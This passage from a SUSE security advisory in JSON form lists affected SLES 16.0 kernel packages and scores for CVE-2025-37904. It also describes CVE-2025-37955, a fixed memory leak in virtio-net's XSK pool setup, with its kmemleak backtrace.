"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:51:02Z",
"details": "moderate"
}
],
"title": "CVE-2025-37904"
},
{
"cve": "CVE-2025-37955",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-37955"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nvirtio-net: free xsk_buffs on error in virtnet_xsk_pool_enable()\n\nThe selftests added to our CI by Bui Quang Minh recently reveals\nthat there is a mem leak on the error path of virtnet_xsk_pool_enable():\n\nunreferenced object 0xffff88800a68a000 (size 2048):\n comm \"xdp_helper\", pid 318, jiffies 4294692778\n hex dump (first 32 bytes):\n 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................\n 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................\n backtrace (crc 0):\n __kvmalloc_node_noprof+0x402/0x570\n virtnet_xsk_pool_enable+0x293/0x6a0 (drivers/net/virtio_net.c:5882)\n xp_assign_dev+0x369/0x670 (net/xdp/xsk_buff_pool.c:226)\n xsk_bind+0x6a5/0x1ae0\n __sys_bind+0x15e/0x230\n __x64_sys_bind+0x72/0xb0\n do_syscall_64+0xc1/0x1d0\n entry_SYSCALL_64_after_hwframe+0x77/0x7f",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
},
"references": [
{
"category": "external",
